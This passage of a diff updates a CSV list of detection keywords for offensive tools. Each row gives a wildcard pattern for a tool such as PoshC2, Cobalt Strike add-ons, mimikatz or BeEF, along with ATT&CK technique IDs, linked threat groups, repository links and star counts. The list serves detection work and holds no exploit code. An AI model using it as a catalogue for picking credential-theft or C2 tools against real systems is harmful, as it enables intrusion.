control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*portscan386 *","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*portscan64 *","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*PortScan-Alive*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - 
TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*portscanner.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*portscanner.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*portscanner.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*Portscan-Port*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*portScanWithService.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
@@ -14870,38 +15038,38 @@ "*portswigger.net*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*posh_in_mem*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*posh_stageless.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*Posh_v4_dropper_*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Posh_v4_x64_*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
-"*Posh_v4_x86_*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*PoshC2-*.zip*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*poshc2.server*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*poshc2.service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*poshc2-ansible-main.yml*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. 
*nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*posh-cookie-decryptor*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*posh-delete *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Posh_v4_dropper_*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Posh_v4_x64_*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Posh_v4_x86_*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*PoshC2-*.zip*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshc2.server*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshc2.service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 
- T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshc2-ansible-main.yml*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-cookie-decryptor*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - 
T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-delete *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*poshkatz.psd1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Stealthbits/poshkatz","1","1","N/A","10","3","210","33","2019-12-28T15:53:40Z","2018-10-29T16:07:40Z" -"*posh-project *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*posh-project -*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. 
*nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*posh-server -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*posh-server -*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. 
*nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*posh-update *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-project *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-project 
